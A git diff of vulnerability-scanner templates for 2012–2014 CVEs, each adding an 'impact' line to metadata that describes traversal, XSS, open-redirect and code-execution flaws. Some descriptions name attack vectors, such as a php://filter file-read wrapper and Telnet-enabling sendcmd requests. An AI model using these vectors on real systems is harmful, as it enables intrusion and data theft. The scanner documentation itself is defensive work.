@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 44d840b3f6..819907bb7e 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: low description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or upgrade to a newer version of OpenEMR. reference: diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 1134d23017..f718df0eca 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and compromise of the affected system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36784 diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 76416fd698..2b9c7296e1 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php. + impact: | + Successful exploitation of these vulnerabilities could allow an attacker to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36873 diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 8393c0b888..3b8a88d856 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. + impact: | + Remote code execution remediation: | Upgrade to a patched version of PHP or apply the necessary security patches. reference: diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index ae574af284..b5c08953db 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the All-in-One Event Calendar plugin to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 750de02ed3..5b25f5d346 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of the WP-FaceThumb plugin (0.2 or higher) which includes proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 68d545a05d..4e43ce956a 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -8,6 +8,8 @@ info: An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution. remediation: | Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index c62d9ecca4..bd41fd09b0 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or further exploitation. remediation: | Upgrade to WebsitePanel v1.2.2.1 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 915797b17b..6623548d0b 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Plugin MF Gig Calendar to mitigate this vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 8a6ed1bde7..27121fd1e6 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to a patched version of MySQLDumper or apply the necessary security patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index d3e8795149..4e77433ac3 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the 2 Click Socialmedia Buttons plugin (0.34 or higher) to fix the XSS vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 783b071d71..3242abfcaf 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + impact: | + Allows remote attackers to inject arbitrary web script or HTML via the 'url' parameter. reference: - https://www.exploit-db.com/exploits/36164 - https://nvd.nist.gov/vuln/detail/CVE-2012-4547 diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index f54715f549..a9c99aeeb2 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of Download Monitor (3.3.5.9 or higher) or apply the official patch provided by the plugin developer. reference: diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index bdae8173e9..2cda1b38e7 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. + impact: | + An attacker can read or modify sensitive files on the server, potentially leading to unauthorized accessand data leakage. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FlatnuX CMS. reference: diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 99d165329b..d641f31877 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. remediation: | Apply the latest security patch or upgrade to a newer version of ManageEngine Firewall Analyzer. reference: diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 721f35973b..b531f9bd96 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI. + impact: | + An attacker can read sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Axigen Mail Server. reference: diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index ce0a2a0c76..10c4a71d87 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest security patches or upgrade to a newer version of Forescout CounterACT to fix the open redirect vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index dd0a23a854..3fcf10e078 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection + impact: | + Successful exploitation of this vulnerability could lead to phishing attacks and potential unauthorized access to sensitive information. remediation: | Apply the latest security patches or upgrade to a newer version of TikiWiki CMS Groupware to mitigate the risk of open redirect vulnerabilities. reference: diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 016edb6791..3ead5b8d07 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update the WordPress Integrator plugin to the latest version or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index af0a0420f5..180c58b2e4 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Update to the latest version of the WordPress Plugin Age Verification or remove the plugin if not needed. reference: diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 439b8a9903..57bce42903 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution on the affected server. remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later. reference: - http://struts.apache.org/development/2.x/docs/s2-012.html diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index 781bcf578a..58d51dfc1d 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. + impact: | + An attacker can exploit these vulnerabilities to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. reference: - https://www.exploit-db.com/exploits/38666 diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index c41c320328..989e20b00a 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -5,6 +5,8 @@ info: author: exploitation,dwisiswant0,alex severity: critical description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code. + impact: | + This vulnerability can lead to remote code execution, allowing attackers to take control of the affected system. remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. reference: - http://struts.apache.org/release/2.3.x/docs/s2-016.html diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 5084c52336..06373c1701 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Plugin Uploader or apply a patch provided by the vendor to fix the XSS vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index 58a18da05f..e4221fae05 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade to the latest version of Telaen to fix the open redirect vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 1703425ab4..3879a0231c 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 296cc84781..c4dd7108c7 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Plugin Category Grid View Gallery or apply the provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 77e759b62a..9c4eb8d59b 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to Duplicator 0.4.5 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-4625 diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index bb216b2fc9..7963f2a804 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 + impact: | + Successful exploitation of this vulnerability could allow an attacker to access sensitive files and directories on the affected system. remediation: | Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 734c242e92..b311b91712 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. + impact: | + An attacker can read arbitrary files on the server. remediation: | Upgrade to a patched version of Xibo. reference: diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index b736bf450b..c68ab62911 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress site, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress Spreadsheet plugin to the latest version, which includes proper input sanitization to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 4378843f5e..33319391d9 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml 
@@ -5,6 +5,8 @@ info: author: rubina119 severity: medium description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or upgrade to a newer version of Zimbra Collaboration Server to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index fdc08b7c1c..59c571c2c0 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. + impact: | + An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized disclosure of sensitive information. remediation: | Update to the latest version of the Advanced Dewplayer plugin or remove it if it is not actively used. reference: diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 8fd790c066..544d4df6a4 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 633a147679..b60c3e123b 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php. + impact: | + An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage. remediation: | Upgrade to a patched version of DomPHP or apply the necessary security patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 781ab8ce15..a1bc2f9207 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of Eyou E-Mail <3.6 or apply the necessary security patches. reference: diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index a5822163de..0a3e85e171 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. + impact: | + Remote code execution remediation: | Apply the latest firmware update provided by ZTE to fix the vulnerability reference: diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 0bc851ac31..e1cffbd630 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname). + impact: | + Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive data and remote code execution remediation: | Upgrade to a patched version of Lighttpd or apply the necessary security patches reference: diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index cfde8c0f73..9d4d1c1837 100644 
--- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. + impact: | + The vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the affected system. remediation: | Upgrade Dompdf to a version higher than v0.6.0 to mitigate the vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 9e6c00a923..5fc5aae042 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. remediation: Upgrade to v4.0 or later. reference: - https://www.exploit-db.com/exploits/44687 diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 4cb30ccc8f..2a41db0bcd 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + impact: | + An attacker can exploit this vulnerability to view sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the system. remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. reference: - https://www.kb.cert.org/vuls/id/774788 diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index 298e21947b..97ebff1ed2 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. + impact: | + Allows remote attackers to execute arbitrary code on the affected system remediation: | Upgrade to a patched version of ElasticSearch reference: diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 09e2e4550f..8683dd9192 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml 
